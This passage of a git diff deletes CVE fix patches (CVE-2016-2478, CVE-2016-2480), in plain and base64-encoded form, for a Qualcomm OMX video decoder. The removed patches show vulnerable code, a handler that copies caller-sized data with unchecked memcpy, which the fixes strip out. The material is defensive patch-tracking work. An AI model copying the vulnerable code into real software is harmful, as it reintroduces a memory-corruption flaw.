gICBwRGVzdEJ1ZiA9IG1fdmVuZG9yX2NvbmZpZy5wRGF0YTsKLQotICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJSeGQgU1BTK1BQUyBuUG9ydEluZGV4WyV1XSBsZW5bJXVdIGRhdGFbJXBdIiwKLSAgICAgICAgICAgICAgICAgICAgKHVuc2lnbmVkIGludCltX3ZlbmRvcl9jb25maWcublBvcnRJbmRleCwKLSAgICAgICAgICAgICAgICAgICAgKHVuc2lnbmVkIGludCltX3ZlbmRvcl9jb25maWcubkRhdGFTaXplLAotICAgICAgICAgICAgICAgICAgICBtX3ZlbmRvcl9jb25maWcucERhdGEpOwotICAgICAgICAgICAgd2hpbGUgKGluZGV4IDwgMikgewotICAgICAgICAgICAgICAgIHVpbnQ4ICpwc2l6ZTsKLSAgICAgICAgICAgICAgICBsZW4gPSAqcFNyY0J1ZjsKLSAgICAgICAgICAgICAgICBsZW4gPSBsZW4gPDwgODsKLSAgICAgICAgICAgICAgICBsZW4gfD0gKihwU3JjQnVmICsgMSk7Ci0gICAgICAgICAgICAgICAgcHNpemUgPSAodWludDggKikgJiBsZW47Ci0gICAgICAgICAgICAgICAgbWVtY3B5KHBEZXN0QnVmICsgbmFsX2xlbmd0aCwgcFNyY0J1ZiArIDIsbGVuKTsKLSAgICAgICAgICAgICAgICBmb3IgKHVuc2lnbmVkIGludCBpID0gMDsgaSA8IG5hbF9sZW5ndGg7IGkrKykgewotICAgICAgICAgICAgICAgICAgICBwRGVzdEJ1ZltpXSA9IHBzaXplW25hbF9sZW5ndGggLSAxIC0gaV07Ci0gICAgICAgICAgICAgICAgfQotICAgICAgICAgICAgICAgIC8vbWVtY3B5KHBEZXN0QnVmLHBTcmNCdWYsKGxlbisyKSk7Ci0gICAgICAgICAgICAgICAgcERlc3RCdWYgKz0gbGVuICsgbmFsX2xlbmd0aDsKLSAgICAgICAgICAgICAgICBwU3JjQnVmICs9IGxlbiArIDI7Ci0gICAgICAgICAgICAgICAgaW5kZXgrKzsKLSAgICAgICAgICAgICAgICBwU3JjQnVmKys7ICAgLy8gc2tpcCBwaWN0dXJlIHBhcmFtIHNldAotICAgICAgICAgICAgICAgIGxlbiA9IDA7Ci0gICAgICAgICAgICB9Ci0gICAgICAgIH0gZWxzZSBpZiAoIXN0cmNtcChkcnZfY3R4LmtpbmQsICJPTVgucWNvbS52aWRlby5kZWNvZGVyLm1wZWc0IikgfHwKLSAgICAgICAgICAgICAgICAhc3RyY21wKGRydl9jdHgua2luZCwgIk9NWC5xY29tLnZpZGVvLmRlY29kZXIubXBlZzIiKSkgewotICAgICAgICAgICAgbV92ZW5kb3JfY29uZmlnLm5Qb3J0SW5kZXggPSBjb25maWctPm5Qb3J0SW5kZXg7Ci0gICAgICAgICAgICBtX3ZlbmRvcl9jb25maWcubkRhdGFTaXplID0gY29uZmlnLT5uRGF0YVNpemU7Ci0gICAgICAgICAgICBtX3ZlbmRvcl9jb25maWcucERhdGEgPSAoT01YX1U4ICopIG1hbGxvYygoY29uZmlnLT5uRGF0YVNpemUpKTsKLSAgICAgICAgICAgIG1lbWNweShtX3ZlbmRvcl9jb25maWcucERhdGEsIGNvbmZpZy0+cERhdGEsY29uZmlnLT5uRGF0YVNpemUpOwotICAgICAgICB9IGVsc2UgaWYgKCFzdHJjbXAoZHJ2X2N0eC5raW5kLCAiT01YLnFjb20udmlkZW8uZGVjb2Rlci52YzEiKSkgewotICAgICAgICAgICAgaWYgKG1fdmVuZG9yX2NvbmZpZy5wRGF0YSkgewotICAgICAgICAgICAgICAgIGZyZWUobV92ZW5kb3JfY29uZmlnLnBEYXRhKTsKLSAgICAgICAgICAgICAgICBtX3ZlbmRvcl9jb25maWcucERhdGEgPSBOVUxMOwotICAgICAgICAgICAgICAgIG1fdmVuZG9yX2NvbmZpZy5uRGF0YVNpemUgPSAwOwotICAgICAgICAgICAgfQotCi0gICAgICAgICAgICBpZiAoKCgqKChPTVhfVTMyICopIGNvbmZpZy0+cERhdGEpKSAmCi0gICAgICAgICAgICAgICAgICAgICAgICBWQzFfU1BfTVBfU1RBUlRfQ09ERV9NQVNLKSA9PQotICAgICAgICAgICAgICAgICAgICBWQzFfU1BfTVBfU1RBUlRfQ09ERSkgewotICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygic2V0X2NvbmZpZyAtIFZDMSBzaW1wbGUvbWFpbiBwcm9maWxlIik7Ci0gICAgICAgICAgICAgICAgbV92ZW5kb3JfY29uZmlnLm5Qb3J0SW5kZXggPSBjb25maWctPm5Qb3J0SW5kZXg7Ci0gICAgICAgICAgICAgICAgbV92ZW5kb3JfY29uZmlnLm5EYXRhU2l6ZSA9IGNvbmZpZy0+bkRhdGFTaXplOwotICAgICAgICAgICAgICAgIG1fdmVuZG9yX2NvbmZpZy5wRGF0YSA9Ci0gICAgICAgICAgICAgICAgICAgIChPTVhfVTggKikgbWFsbG9jKGNvbmZpZy0+bkRhdGFTaXplKTsKLSAgICAgICAgICAgICAgICBtZW1jcHkobV92ZW5kb3JfY29uZmlnLnBEYXRhLCBjb25maWctPnBEYXRhLAotICAgICAgICAgICAgICAgICAgICAgICAgY29uZmlnLT5uRGF0YVNpemUpOwotICAgICAgICAgICAgICAgIG1fdmMxX3Byb2ZpbGUgPSBWQzFfU1BfTVBfUkNWOwotICAgICAgICAgICAgfSBlbHNlIGlmICgqKChPTVhfVTMyICopIGNvbmZpZy0+cERhdGEpID09IFZDMV9BUF9TRVFfU1RBUlRfQ09ERSkgewotICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygic2V0X2NvbmZpZyAtIFZDMSBBZHZhbmNlIHByb2ZpbGUiKTsKLSAgICAgICAgICAgICAgICBtX3ZlbmRvcl9jb25maWcublBvcnRJbmRleCA9IGNvbmZpZy0+blBvcnRJbmRleDsKLSAgICAgICAgICAgICAgICBtX3ZlbmRvcl9jb25maWcubkRhdGFTaXplID0gY29uZmlnLT5uRGF0YVNpemU7Ci0gICAgICAgICAgICAgICAgbV92ZW5kb3JfY29uZmlnLnBEYXRhID0KLSAgICAgICAgICAgICAgICAgICAgKE9NWF9VOCAqKSBtYWxsb2MoKGNvbmZpZy0+bkRhdGFTaXplKSk7Ci0gICAgICAgICAgICAgICAgbWVtY3B5KG1fdmVuZG9yX2NvbmZpZy5wRGF0YSwgY29uZmlnLT5wRGF0YSwKLSAgICAgICAgICAgICAgICAgICAgICAgIGNvbmZpZy0+bkRhdGFTaXplKTsKLSAgICAgICAgICAgICAgICBtX3ZjMV9wcm9maWxlID0gVkMxX0FQOwotICAgICAgICAgICAgfSBlbHNlIGlmICgoY29uZmlnLT5uRGF0YVNpemUgPT0gVkMxX1NUUlVDVF9DX0xFTikpIHsKLSAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coInNldF9jb25maWcgLSBWQzEgU2ltcGxlL01haW4gcHJvZmlsZSBzdHJ1Y3QgQyBvbmx5Iik7Ci0gICAgICAgICAgICAgICAgbV92ZW5kb3JfY29uZmlnLm5Qb3J0SW5kZXggPSBjb25maWctPm5Qb3J0SW5kZXg7Ci0gICAgICAgICAgICAgICAgbV92ZW5kb3JfY29uZmlnLm5EYXRhU2l6ZSAgPSBjb25maWctPm5EYXRhU2l6ZTsKLSAgICAgICAgICAgICAgICBtX3ZlbmRvcl9jb25maWcucERhdGEgPSAoT01YX1U4KiltYWxsb2MoY29uZmlnLT5uRGF0YVNpemUpOwotICAgICAgICAgICAgICAgIG1lbWNweShtX3ZlbmRvcl9jb25maWcucERhdGEsY29uZmlnLT5wRGF0YSxjb25maWctPm5EYXRhU2l6ZSk7Ci0gICAgICAgICAgICAgICAgbV92YzFfcHJvZmlsZSA9IFZDMV9TUF9NUF9SQ1Y7Ci0gICAgICAgICAgICB9IGVsc2UgewotICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygic2V0X2NvbmZpZyAtIEVycm9yOiBVbmtub3duIFZDMSBwcm9maWxlIik7Ci0gICAgICAgICAgICB9Ci0gICAgICAgIH0KLSAgICAgICAgcmV0dXJuIHJldDsKLSAgICB9IGVsc2UgaWYgKGNvbmZpZ0luZGV4ID09IE9NWF9JbmRleENvbmZpZ1ZpZGVvTmFsU2l6ZSkgeworICAgIGlmIChjb25maWdJbmRleCA9PSBPTVhfSW5kZXhDb25maWdWaWRlb05hbFNpemUpIHsKICAgICAgICAgc3RydWN0IHY0bDJfY29udHJvbCB0ZW1wOwogICAgICAgICB0ZW1wLmlkID0gVjRMMl9DSURfTVBFR19WSURDX1ZJREVPX1NUUkVBTV9GT1JNQVQ7CiAK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-2478/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2478/ANY/0001.patch
deleted file mode 100644
index 420fbeff..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2478/ANY/0001.patch
+++ /dev/null
@@ -1,116 +0,0 @@
-diff --git a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-index 3b84707..977aef2 100644
---- a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-+++ b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-@@ -4272,110 +4272,7 @@
- 
-     DEBUG_PRINT_LOW("Set Config Called");
- 
--    if (configIndex == (OMX_INDEXTYPE)OMX_IndexVendorVideoExtraData) {
--        OMX_VENDOR_EXTRADATATYPE *config = (OMX_VENDOR_EXTRADATATYPE *) configData;
--        DEBUG_PRINT_LOW("Index OMX_IndexVendorVideoExtraData called");
--        if (!strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.avc") ||
--            !strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.mvc")) {
--            DEBUG_PRINT_LOW("Index OMX_IndexVendorVideoExtraData AVC");
--            OMX_U32 extra_size;
--            // Parsing done here for the AVC atom is definitely not generic
--            // Currently this piece of code is working, but certainly
--            // not tested with all .mp4 files.
--            // Incase of failure, we might need to revisit this
--            // for a generic piece of code.
--
--            // Retrieve size of NAL length field
--            // byte #4 contains the size of NAL lenght field
--            nal_length = (config->pData[4] & 0x03) + 1;
--
--            extra_size = 0;
--            if (nal_length > 2) {
--                /* Presently we assume that only one SPS and one PPS in AvC1 Atom */
--                extra_size = (nal_length - 2) * 2;
--            }
--
--            // SPS starts from byte #6
--            OMX_U8 *pSrcBuf = (OMX_U8 *) (&config->pData[6]);
--            OMX_U8 *pDestBuf;
--            m_vendor_config.nPortIndex = config->nPortIndex;
--
--            // minus 6 --> SPS starts from byte #6
--            // minus 1 --> picture param set byte to be ignored from avcatom
--            m_vendor_config.nDataSize = config->nDataSize - 6 - 1 + extra_size;
--            m_vendor_config.pData = (OMX_U8 *) malloc(m_vendor_config.nDataSize);
--            OMX_U32 len;
--            OMX_U8 index = 0;
--            // case where SPS+PPS is sent as part of set_config
--            pDestBuf = m_vendor_config.pData;
--
--            DEBUG_PRINT_LOW("Rxd SPS+PPS nPortIndex[%u] len[%u] data[%p]",
--                    (unsigned int)m_vendor_config.nPortIndex,
--                    (unsigned int)m_vendor_config.nDataSize,
--                    m_vendor_config.pData);
--            while (index < 2) {
--                uint8 *psize;
--                len = *pSrcBuf;
--                len = len << 8;
--                len |= *(pSrcBuf + 1);
--                psize = (uint8 *) & len;
--                memcpy(pDestBuf + nal_length, pSrcBuf + 2,len);
--                for (unsigned int i = 0; i < nal_length; i++) {
--                    pDestBuf[i] = psize[nal_length - 1 - i];
--                }
--                //memcpy(pDestBuf,pSrcBuf,(len+2));
--                pDestBuf += len + nal_length;
--                pSrcBuf += len + 2;
--                index++;
--                pSrcBuf++;   // skip picture param set
--                len = 0;
--            }
--        } else if (!strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.mpeg4") ||
--                !strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.mpeg2")) {
--            m_vendor_config.nPortIndex = config->nPortIndex;
--            m_vendor_config.nDataSize = config->nDataSize;
--            m_vendor_config.pData = (OMX_U8 *) malloc((config->nDataSize));
--            memcpy(m_vendor_config.pData, config->pData,config->nDataSize);
--        } else if (!strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.vc1")) {
--            if (m_vendor_config.pData) {
--                free(m_vendor_config.pData);
--                m_vendor_config.pData = NULL;
--                m_vendor_config.nDataSize = 0;
--            }
--
--            if (((*((OMX_U32 *) config->pData)) &
--                        VC1_SP_MP_START_CODE_MASK) ==
--                    VC1_SP_MP_START_CODE) {
--                DEBUG_PRINT_LOW("set_config - VC1 simple/main profile");
--                m_vendor_config.nPortIndex = config->nPortIndex;
--                m_vendor_config.nDataSize = config->nDataSize;
--                m_vendor_config.pData =
--                    (OMX_U8 *) malloc(config->nDataSize);
--                memcpy(m_vendor_config.pData, config->pData,
--                        config->nDataSize);
--                m_vc1_profile = VC1_SP_MP_RCV;
--            } else if (*((OMX_U32 *) config->pData) == VC1_AP_SEQ_START_CODE) {
--                DEBUG_PRINT_LOW("set_config - VC1 Advance profile");
--                m_vendor_config.nPortIndex = config->nPortIndex;
--                m_vendor_config.nDataSize = config->nDataSize;
--                m_vendor_config.pData =
--                    (OMX_U8 *) malloc((config->nDataSize));
--                memcpy(m_vendor_config.pData, config->pData,
--                        config->nDataSize);
--                m_vc1_profile = VC1_AP;
--            } else if ((config->nDataSize == VC1_STRUCT_C_LEN)) {
--                DEBUG_PRINT_LOW("set_config - VC1 Simple/Main profile struct C only");
--                m_vendor_config.nPortIndex = config->nPortIndex;
--                m_vendor_config.nDataSize  = config->nDataSize;
--                m_vendor_config.pData = (OMX_U8*)malloc(config->nDataSize);
--                memcpy(m_vendor_config.pData,config->pData,config->nDataSize);
--                m_vc1_profile = VC1_SP_MP_RCV;
--            } else {
--                DEBUG_PRINT_LOW("set_config - Error: Unknown VC1 profile");
--            }
--        }
--        return ret;
--    } else if (configIndex == OMX_IndexConfigVideoNalSize) {
-+    if (configIndex == OMX_IndexConfigVideoNalSize) {
-         struct v4l2_control temp;
-         temp.id = V4L2_CID_MPEG_VIDC_VIDEO_STREAM_FORMAT;
- 
diff --git a/Patches/Linux_CVEs/CVE-2016-2478/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-2478/ANY/0001.patch.base64
deleted file mode 100644
index d5f478b9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2478/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL21tLXZpZGVvLXY0bDIvdmlkYy92ZGVjL3NyYy9vbXhfdmRlY19tc204OTc0LmNwcCBiL21tLXZpZGVvLXY0bDIvdmlkYy92ZGVjL3NyYy9vbXhfdmRlY19tc204OTc0LmNwcAppbmRleCAzYjg0NzA3Li45NzdhZWYyIDEwMDY0NAotLS0gYS9tbS12aWRlby12NGwyL3ZpZGMvdmRlYy9zcmMvb214X3ZkZWNfbXNtODk3NC5jcHAKKysrIGIvbW0tdmlkZW8tdjRsMi92aWRjL3ZkZWMvc3JjL29teF92ZGVjX21zbTg5NzQuY3BwCkBAIC00MjcyLDExMCArNDI3Miw3IEBACiAKICAgICBERUJVR19QUklOVF9MT1coIlNldCBDb25maWcgQ2FsbGVkIik7CiAKLSAgICBpZiAoY29uZmlnSW5kZXggPT0gKE9NWF9JTkRFWFRZUEUpT01YX0luZGV4VmVuZG9yVmlkZW9FeHRyYURhdGEpIHsKLSAgICAgICAgT01YX1ZFTkRPUl9FWFRSQURBVEFUWVBFICpjb25maWcgPSAoT01YX1ZFTkRPUl9FWFRSQURBVEFUWVBFICopIGNvbmZpZ0RhdGE7Ci0gICAgICAgIERFQlVHX1BSSU5UX0xPVygiSW5kZXggT01YX0luZGV4VmVuZG9yVmlkZW9FeHRyYURhdGEgY2FsbGVkIik7Ci0gICAgICAgIGlmICghc3RyY21wKGRydl9jdHgua2luZCwgIk9NWC5xY29tLnZpZGVvLmRlY29kZXIuYXZjIikgfHwKLSAgICAgICAgICAgICFzdHJjbXAoZHJ2X2N0eC5raW5kLCAiT01YLnFjb20udmlkZW8uZGVjb2Rlci5tdmMiKSkgewotICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJJbmRleCBPTVhfSW5kZXhWZW5kb3JWaWRlb0V4dHJhRGF0YSBBVkMiKTsKLSAgICAgICAgICAgIE9NWF9VMzIgZXh0cmFfc2l6ZTsKLSAgICAgICAgICAgIC8vIFBhcnNpbmcgZG9uZSBoZXJlIGZvciB0aGUgQVZDIGF0b20gaXMgZGVmaW5pdGVseSBub3QgZ2VuZXJpYwotICAgICAgICAgICAgLy8gQ3VycmVudGx5IHRoaXMgcGllY2Ugb2YgY29kZSBpcyB3b3JraW5nLCBidXQgY2VydGFpbmx5Ci0gICAgICAgICAgICAvLyBub3QgdGVzdGVkIHdpdGggYWxsIC5tcDQgZmlsZXMuCi0gICAgICAgICAgICAvLyBJbmNhc2Ugb2YgZmFpbHVyZSwgd2UgbWlnaHQgbmVlZCB0byByZXZpc2l0IHRoaXMKLSAgICAgICAgICAgIC8vIGZvciBhIGdlbmVyaWMgcGllY2Ugb2YgY29kZS4KLQotICAgICAgICAgICAgLy8gUmV0cmlldmUgc2l6ZSBvZiBOQUwgbGVuZ3RoIGZpZWxkCi0gICAgICAgICAgICAvLyBieXRlICM0IGNvbnRhaW5zIHRoZSBzaXplIG9mIE5BTCBsZW5naHQgZmllbGQKLSAgICAgICAgICAgIG5hbF9sZW5ndGggPSAoY29uZmlnLT5wRGF0YVs0XSAmIDB4MDMpICsgMTsKLQotICAgICAgICAgICAgZXh0cmFfc2l6ZSA9IDA7Ci0gICAgICAgICAgICBpZiAobmFsX2xlbmd0aCA+IDIpIHsKLSAgICAgICAgICAgICAgICAvKiBQcmVzZW50bHkgd2UgYXNzdW1lIHRoYXQgb25seSBvbmUgU1BTIGFuZCBvbmUgUFBTIGluIEF2QzEgQXRvbSAqLwotICAgICAgICAgICAgICAgIGV4dHJhX3NpemUgPSAobmFsX2xlbmd0aCAtIDIpICogMjsKLSAgICAgICAgICAgIH0KLQotICAgICAgICAgICAgLy8gU1BTIHN0YXJ0cyBmcm9tIGJ5dGUgIzYKLSAgICAgICAgICAgIE9NWF9VOCAqcFNyY0J1ZiA9IChPTVhfVTggKikgKCZjb25maWctPnBEYXRhWzZdKTsKLSAgICAgICAgICAgIE9NWF9VOCAqcERlc3RCdWY7Ci0gICAgICAgICAgICBtX3ZlbmRvcl9jb25maWcublBvcnRJbmRleCA9IGNvbmZpZy0+blBvcnRJbmRleDsKLQotICAgICAgICAgICAgLy8gbWludXMgNiAtLT4gU1BTIHN0YXJ0cyBmcm9tIGJ5dGUgIzYKLSAgICAgICAgICAgIC8vIG1pbnVzIDEgLS0+IHBpY3R1cmUgcGFyYW0gc2V0IGJ5dGUgdG8gYmUgaWdub3JlZCBmcm9tIGF2Y2F0b20KLSAgICAgICAgICAgIG1fdmVuZG9yX2NvbmZpZy5uRGF0YVNpemUgPSBjb25maWctPm5EYXRhU2l6ZSAtIDYgLSAxICsgZXh0cmFfc2l6ZTsKLSAgICAgICAgICAgIG1fdmVuZG9yX2NvbmZpZy5wRGF0YSA9IChPTVhfVTggKikgbWFsbG9jKG1fdmVuZG9yX2NvbmZpZy5uRGF0YVNpemUpOwotICAgICAgICAgICAgT01YX1UzMiBsZW47Ci0gICAgICAgICAgICBPTVhfVTggaW5kZXggPSAwOwotICAgICAgICAgICAgLy8gY2FzZSB3aGVyZSBTUFMrUFBTIGlzIHNlbnQgYXMgcGFydCBvZiBzZXRfY29uZmlnCi0gICAgICAgICAgICBwRGVzdEJ1ZiA9IG1fdmVuZG9yX2NvbmZpZy5wRGF0YTsKLQotICAgICAgICAgICAgREVCVUdfUFJJTlRfTE9XKCJSeGQgU1BTK1BQUyBuUG9ydEluZGV4WyV1XSBsZW5bJXVdIGRhdGFbJXBdIiwKLSAgICAgICAgICAgICAgICAgICAgKHVuc2lnbmVkIGludCltX3ZlbmRvcl9jb25maWcublBvcnRJbmRleCwKLSAgICAgICAgICAgICAgICAgICAgKHVuc2lnbmVkIGludCltX3ZlbmRvcl9jb25maWcubkRhdGFTaXplLAotICAgICAgICAgICAgICAgICAgICBtX3ZlbmRvcl9jb25maWcucERhdGEpOwotICAgICAgICAgICAgd2hpbGUgKGluZGV4IDwgMikgewotICAgICAgICAgICAgICAgIHVpbnQ4ICpwc2l6ZTsKLSAgICAgICAgICAgICAgICBsZW4gPSAqcFNyY0J1ZjsKLSAgICAgICAgICAgICAgICBsZW4gPSBsZW4gPDwgODsKLSAgICAgICAgICAgICAgICBsZW4gfD0gKihwU3JjQnVmICsgMSk7Ci0gICAgICAgICAgICAgICAgcHNpemUgPSAodWludDggKikgJiBsZW47Ci0gICAgICAgICAgICAgICAgbWVtY3B5KHBEZXN0QnVmICsgbmFsX2xlbmd0aCwgcFNyY0J1ZiArIDIsbGVuKTsKLSAgICAgICAgICAgICAgICBmb3IgKHVuc2lnbmVkIGludCBpID0gMDsgaSA8IG5hbF9sZW5ndGg7IGkrKykgewotICAgICAgICAgICAgICAgICAgICBwRGVzdEJ1ZltpXSA9IHBzaXplW25hbF9sZW5ndGggLSAxIC0gaV07Ci0gICAgICAgICAgICAgICAgfQotICAgICAgICAgICAgICAgIC8vbWVtY3B5KHBEZXN0QnVmLHBTcmNCdWYsKGxlbisyKSk7Ci0gICAgICAgICAgICAgICAgcERlc3RCdWYgKz0gbGVuICsgbmFsX2xlbmd0aDsKLSAgICAgICAgICAgICAgICBwU3JjQnVmICs9IGxlbiArIDI7Ci0gICAgICAgICAgICAgICAgaW5kZXgrKzsKLSAgICAgICAgICAgICAgICBwU3JjQnVmKys7ICAgLy8gc2tpcCBwaWN0dXJlIHBhcmFtIHNldAotICAgICAgICAgICAgICAgIGxlbiA9IDA7Ci0gICAgICAgICAgICB9Ci0gICAgICAgIH0gZWxzZSBpZiAoIXN0cmNtcChkcnZfY3R4LmtpbmQsICJPTVgucWNvbS52aWRlby5kZWNvZGVyLm1wZWc0IikgfHwKLSAgICAgICAgICAgICAgICAhc3RyY21wKGRydl9jdHgua2luZCwgIk9NWC5xY29tLnZpZGVvLmRlY29kZXIubXBlZzIiKSkgewotICAgICAgICAgICAgbV92ZW5kb3JfY29uZmlnLm5Qb3J0SW5kZXggPSBjb25maWctPm5Qb3J0SW5kZXg7Ci0gICAgICAgICAgICBtX3ZlbmRvcl9jb25maWcubkRhdGFTaXplID0gY29uZmlnLT5uRGF0YVNpemU7Ci0gICAgICAgICAgICBtX3ZlbmRvcl9jb25maWcucERhdGEgPSAoT01YX1U4ICopIG1hbGxvYygoY29uZmlnLT5uRGF0YVNpemUpKTsKLSAgICAgICAgICAgIG1lbWNweShtX3ZlbmRvcl9jb25maWcucERhdGEsIGNvbmZpZy0+cERhdGEsY29uZmlnLT5uRGF0YVNpemUpOwotICAgICAgICB9IGVsc2UgaWYgKCFzdHJjbXAoZHJ2X2N0eC5raW5kLCAiT01YLnFjb20udmlkZW8uZGVjb2Rlci52YzEiKSkgewotICAgICAgICAgICAgaWYgKG1fdmVuZG9yX2NvbmZpZy5wRGF0YSkgewotICAgICAgICAgICAgICAgIGZyZWUobV92ZW5kb3JfY29uZmlnLnBEYXRhKTsKLSAgICAgICAgICAgICAgICBtX3ZlbmRvcl9jb25maWcucERhdGEgPSBOVUxMOwotICAgICAgICAgICAgICAgIG1fdmVuZG9yX2NvbmZpZy5uRGF0YVNpemUgPSAwOwotICAgICAgICAgICAgfQotCi0gICAgICAgICAgICBpZiAoKCgqKChPTVhfVTMyICopIGNvbmZpZy0+cERhdGEpKSAmCi0gICAgICAgICAgICAgICAgICAgICAgICBWQzFfU1BfTVBfU1RBUlRfQ09ERV9NQVNLKSA9PQotICAgICAgICAgICAgICAgICAgICBWQzFfU1BfTVBfU1RBUlRfQ09ERSkgewotICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygic2V0X2NvbmZpZyAtIFZDMSBzaW1wbGUvbWFpbiBwcm9maWxlIik7Ci0gICAgICAgICAgICAgICAgbV92ZW5kb3JfY29uZmlnLm5Qb3J0SW5kZXggPSBjb25maWctPm5Qb3J0SW5kZXg7Ci0gICAgICAgICAgICAgICAgbV92ZW5kb3JfY29uZmlnLm5EYXRhU2l6ZSA9IGNvbmZpZy0+bkRhdGFTaXplOwotICAgICAgICAgICAgICAgIG1fdmVuZG9yX2NvbmZpZy5wRGF0YSA9Ci0gICAgICAgICAgICAgICAgICAgIChPTVhfVTggKikgbWFsbG9jKGNvbmZpZy0+bkRhdGFTaXplKTsKLSAgICAgICAgICAgICAgICBtZW1jcHkobV92ZW5kb3JfY29uZmlnLnBEYXRhLCBjb25maWctPnBEYXRhLAotICAgICAgICAgICAgICAgICAgICAgICAgY29uZmlnLT5uRGF0YVNpemUpOwotICAgICAgICAgICAgICAgIG1fdmMxX3Byb2ZpbGUgPSBWQzFfU1BfTVBfUkNWOwotICAgICAgICAgICAgfSBlbHNlIGlmICgqKChPTVhfVTMyICopIGNvbmZpZy0+cERhdGEpID09IFZDMV9BUF9TRVFfU1RBUlRfQ09ERSkgewotICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygic2V0X2NvbmZpZyAtIFZDMSBBZHZhbmNlIHByb2ZpbGUiKTsKLSAgICAgICAgICAgICAgICBtX3ZlbmRvcl9jb25maWcublBvcnRJbmRleCA9IGNvbmZpZy0+blBvcnRJbmRleDsKLSAgICAgICAgICAgICAgICBtX3ZlbmRvcl9jb25maWcubkRhdGFTaXplID0gY29uZmlnLT5uRGF0YVNpemU7Ci0gICAgICAgICAgICAgICAgbV92ZW5kb3JfY29uZmlnLnBEYXRhID0KLSAgICAgICAgICAgICAgICAgICAgKE9NWF9VOCAqKSBtYWxsb2MoKGNvbmZpZy0+bkRhdGFTaXplKSk7Ci0gICAgICAgICAgICAgICAgbWVtY3B5KG1fdmVuZG9yX2NvbmZpZy5wRGF0YSwgY29uZmlnLT5wRGF0YSwKLSAgICAgICAgICAgICAgICAgICAgICAgIGNvbmZpZy0+bkRhdGFTaXplKTsKLSAgICAgICAgICAgICAgICBtX3ZjMV9wcm9maWxlID0gVkMxX0FQOwotICAgICAgICAgICAgfSBlbHNlIGlmICgoY29uZmlnLT5uRGF0YVNpemUgPT0gVkMxX1NUUlVDVF9DX0xFTikpIHsKLSAgICAgICAgICAgICAgICBERUJVR19QUklOVF9MT1coInNldF9jb25maWcgLSBWQzEgU2ltcGxlL01haW4gcHJvZmlsZSBzdHJ1Y3QgQyBvbmx5Iik7Ci0gICAgICAgICAgICAgICAgbV92ZW5kb3JfY29uZmlnLm5Qb3J0SW5kZXggPSBjb25maWctPm5Qb3J0SW5kZXg7Ci0gICAgICAgICAgICAgICAgbV92ZW5kb3JfY29uZmlnLm5EYXRhU2l6ZSAgPSBjb25maWctPm5EYXRhU2l6ZTsKLSAgICAgICAgICAgICAgICBtX3ZlbmRvcl9jb25maWcucERhdGEgPSAoT01YX1U4KiltYWxsb2MoY29uZmlnLT5uRGF0YVNpemUpOwotICAgICAgICAgICAgICAgIG1lbWNweShtX3ZlbmRvcl9jb25maWcucERhdGEsY29uZmlnLT5wRGF0YSxjb25maWctPm5EYXRhU2l6ZSk7Ci0gICAgICAgICAgICAgICAgbV92YzFfcHJvZmlsZSA9IFZDMV9TUF9NUF9SQ1Y7Ci0gICAgICAgICAgICB9IGVsc2UgewotICAgICAgICAgICAgICAgIERFQlVHX1BSSU5UX0xPVygic2V0X2NvbmZpZyAtIEVycm9yOiBVbmtub3duIFZDMSBwcm9maWxlIik7Ci0gICAgICAgICAgICB9Ci0gICAgICAgIH0KLSAgICAgICAgcmV0dXJuIHJldDsKLSAgICB9IGVsc2UgaWYgKGNvbmZpZ0luZGV4ID09IE9NWF9JbmRleENvbmZpZ1ZpZGVvTmFsU2l6ZSkgeworICAgIGlmIChjb25maWdJbmRleCA9PSBPTVhfSW5kZXhDb25maWdWaWRlb05hbFNpemUpIHsKICAgICAgICAgc3RydWN0IHY0bDJfY29udHJvbCB0ZW1wOwogICAgICAgICB0ZW1wLmlkID0gVjRMMl9DSURfTVBFR19WSURDX1ZJREVPX1NUUkVBTV9GT1JNQVQ7CiAK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-2480/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2480/ANY/0001.patch
deleted file mode 100644
index ad8516e6..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2480/ANY/0001.patch
+++ /dev/null
@@ -1,1138 +0,0 @@
-diff --git a/mm-core/inc/OMX_QCOMExtns.h b/mm-core/inc/OMX_QCOMExtns.h
-index f0e1593..eb1b990 100644
---- a/mm-core/inc/OMX_QCOMExtns.h
-+++ b/mm-core/inc/OMX_QCOMExtns.h
-@@ -1,5 +1,5 @@
- /*--------------------------------------------------------------------------
--Copyright (c) 2009-2015, The Linux Foundation. All rights reserved.
-+Copyright (c) 2009-2016, The Linux Foundation. All rights reserved.
- 
- Redistribution and use in source and binary forms, with or without
- modification, are permitted provided that the following conditions are met:
-@@ -1348,6 +1348,8 @@
- } QOMX_VIDEO_QUERY_DECODER_INSTANCES;
- 
- typedef struct QOMX_ENABLETYPE {
-+    OMX_U32 nSize;
-+    OMX_VERSIONTYPE nVersion;
-     OMX_BOOL bEnable;
- } QOMX_ENABLETYPE;
- 
-@@ -1451,6 +1453,8 @@
- 
- 
- typedef struct QOMX_RECTTYPE {
-+    OMX_U32 nSize;
-+    OMX_VERSIONTYPE nVersion;
-     OMX_S32 nLeft;
-     OMX_S32 nTop;
-     OMX_U32 nWidth;
-@@ -1551,7 +1555,6 @@
